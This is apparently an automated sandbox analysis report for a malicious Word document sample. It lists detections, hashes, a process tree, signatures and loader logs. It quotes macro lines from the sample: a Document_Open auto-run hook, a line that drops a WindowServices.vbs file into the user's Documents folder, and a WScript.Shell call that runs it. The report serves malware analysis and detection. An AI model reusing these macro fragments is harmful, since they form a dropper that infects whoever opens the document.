Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1KaTo6P18Z.doc

Overview

General Information

Sample name:1KaTo6P18Z.doc
renamed because original name is a hash value
Original sample name:1ae98e28ff5e890d00429031f5369692389256290dd4e5867f822db51cdc8027(1).doc
Analysis ID:1590808
MD5:f8b594e0b1d7a56093034e74d9374f6a
SHA1:f42044adff61da67c1f7436625a4d7a86c1f6e33
SHA256:1ae98e28ff5e890d00429031f5369692389256290dd4e5867f822db51cdc8027
Tags:app8490744dochko247blackuser-JAMESWT_MHT
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Machine Learning detection for sample
Contains capabilities to detect virtual machines
Detected non-DNS traffic on DNS port
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains an embedded VBA which might only executes on specific systems (country or language check)
Document contains embedded VBA macros
Potential document exploit detected (unknown TCP traffic)
Sigma detected: Execution of Suspicious File Type Extension
Spawns drivers

Classification

Process Tree

  • System is w11x64_office
  • WINWORD.EXE (PID: 4512 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: A9F0EC89897AC6C878D217DFB64CA752)
  • SystemSettingsBroker.exe (PID: 2292 cmdline: C:\Windows\System32\SystemSettingsBroker.exe -Embedding MD5: 899E65893CDEE7F9022DC9B583F94F0F)
  • rassstp.sys (PID: 4 cmdline: MD5: 6931A955F0697B3A675E3F1B1B058D96)
  • ndproxy.sys (PID: 4 cmdline: MD5: 8236B9B87FCB51A225A5B69A23C6DCBA)
  • agilevpn.sys (PID: 4 cmdline: MD5: 9470BBB777C18559249CB627755AE05A)
  • rasl2tp.sys (PID: 4 cmdline: MD5: 31026F5886DD4B3507C26173933722BE)
  • raspptp.sys (PID: 4 cmdline: MD5: DD210C0462E41139AA1E06AE8C82C6BA)
  • raspppoe.sys (PID: 4 cmdline: MD5: A664DB4B37AB3904F14242E7882469FB)
  • ndistapi.sys (PID: 4 cmdline: MD5: F2EB1438623A09E1659E5B5706D15B38)
  • ndiswan.sys (PID: 4 cmdline: MD5: E63671FE12F81F56D79B1CC58305AD64)
  • smartscreen.exe (PID: 3312 cmdline: C:\Windows\System32\smartscreen.exe -Embedding MD5: D447511B1A99D72F21DC1A148F1A32A3)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Execution of Suspicious File Type Extension
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\rassstp.sys, NewProcessName: C:\Windows\System32\drivers\rassstp.sys, OriginalFileName: C:\Windows\System32\drivers\rassstp.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: rassstp.sys

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: 1KaTo6P18Z.docVirustotal: Detection: 54%Perma Link
Source: 1KaTo6P18Z.docReversingLabs: Detection: 42%
Machine Learning detection for sample
Source: 1KaTo6P18Z.docJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: global trafficTCP traffic: 192.168.2.25:52653 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.25:52653
Source: global trafficTCP traffic: 192.168.2.25:52653 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.25:52653 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.25:52653
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.25:52653
Source: global trafficTCP traffic: 192.168.2.25:52653 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.25:52653
Source: global trafficTCP traffic: 192.168.2.25:52653 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.25:52653 -> 1.1.1.1:53
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1

System Summary

barindex
Document contains an embedded VBA macro which may execute processes
Source: 1KaTo6P18Z.docOLE, VBA macro line: shell.Run """" & vbsFilePath & """", 1, True
Document contains an embedded VBA macro with suspicious strings
Source: 1KaTo6P18Z.docOLE, VBA macro line: Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
Source: 1KaTo6P18Z.docOLE, VBA macro line: Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
Source: 1KaTo6P18Z.docOLE, VBA macro line: Private Declare PtrSafe Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
Source: 1KaTo6P18Z.docOLE, VBA macro line: Private Declare PtrSafe Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
Source: 1KaTo6P18Z.docOLE, VBA macro line: Private Declare PtrSafe Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
Source: 1KaTo6P18Z.docOLE, VBA macro line: Private Declare Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
Source: 1KaTo6P18Z.docOLE, VBA macro line: Private Declare Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
Source: 1KaTo6P18Z.docOLE, VBA macro line: Private Declare Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
Source: 1KaTo6P18Z.docOLE, VBA macro line: vbsFilePath = Environ("USERPROFILE") & "\Documents\WindowServices.vbs"
Source: 1KaTo6P18Z.docOLE, VBA macro line: Set shell = CreateObject("WScript.Shell")
Source: VBA code instrumentationOLE, VBA macro: Module keoaoe, Function TestAES, String environ: vbsFilePath = Environ("USERPROFILE") & "\Documents\WindowServices.vbs"Name: TestAES
Source: VBA code instrumentationOLE, VBA macro: Module keoaoe, Function TestAES, String wscript: Set shell = CreateObject("WScript.Shell")Name: TestAES
Document contains an embedded VBA with base64 encoded strings
Source: VBA code instrumentationOLE, VBA macro: Module Module3, Function pvCryptoAesCtrInit, String ObjectLength
Source: VBA code instrumentationOLE, VBA macro: Module Module3, Function pvCryptoAesCtrInit, String HashDigestLength
Source: 1KaTo6P18Z.docOLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_OpenName: Document_Open
Source: 1KaTo6P18Z.docOLE indicator, VBA macros: true
Source: unknownDriver loaded: C:\Windows\System32\drivers\rassstp.sys
Source: classification engineClassification label: mal72.expl.evad.winDOC@4/2@0/0
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\Desktop\~$aTo6P18Z.docJump to behavior
Source: C:\Windows\System32\smartscreen.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3312:120:WilError_03
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{4B8A849F-584A-4C85-BAB2-744B01DAA748} - OProcSessId.datJump to behavior
Source: 1KaTo6P18Z.docOLE indicator, Word Document stream: true
Source: 1KaTo6P18Z.docOLE document summary: title field not present or empty
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 1KaTo6P18Z.docVirustotal: Detection: 54%
Source: 1KaTo6P18Z.docReversingLabs: Detection: 42%
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: unknownProcess created: C:\Windows\System32\SystemSettingsBroker.exe C:\Windows\System32\SystemSettingsBroker.exe -Embedding
Source: unknownProcess created: C:\Windows\System32\smartscreen.exe C:\Windows\System32\smartscreen.exe -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: systemsettings.datamodel.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: settingshandlers_display.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: cfgmgr32.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: deviceassociation.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: settingshandlers_accessibility.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: settingshandlers_sharedexperiences_rome.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: windows.internal.accessibility.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: windows.internal.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: windows.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: windows.cloudstore.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: windows.devices.radios.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: settingshandlers_devices.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: wincorlib.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: appextension.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: windows.staterepositorycore.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: audiohandlers.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: mmdevapi.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: winmmbase.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: uvcmodel.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: audioses.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: devobj.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: capabilityaccessmanagerclient.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: windows.media.devices.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: mrmcorer.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: languageoverlayutil.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: bcp47mrm.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: deviceflows.datamodel.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: threadpoolwinrt.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: devdispitemprovider.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: devicedisplaystatusmanager.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: fundisc.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: fddevquery.dllJump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exeSection loaded: windows.graphics.dllJump to behavior
Source: C:\Windows\System32\smartscreen.exeSection loaded: smartscreen.dllJump to behavior
Source: C:\Windows\System32\smartscreen.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\smartscreen.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\smartscreen.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\smartscreen.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\smartscreen.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\smartscreen.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\smartscreen.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\smartscreen.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\smartscreen.exeSection loaded: smartscreenps.dllJump to behavior
Source: C:\Windows\System32\smartscreen.exeSection loaded: windows.management.workplace.dllJump to behavior
Source: C:\Windows\System32\smartscreen.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\smartscreen.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\smartscreen.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InprocServer32Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEWindow found: window name: SysTabControl32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEWindow detected: Number of UI elements: 15
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEWindow detected: Number of UI elements: 15
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior

Data Obfuscation

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: 1KaTo6P18Z.docStream path 'Macros/VBA/Module3' : High number of GOTO operations
Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Module3Name: Module3
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
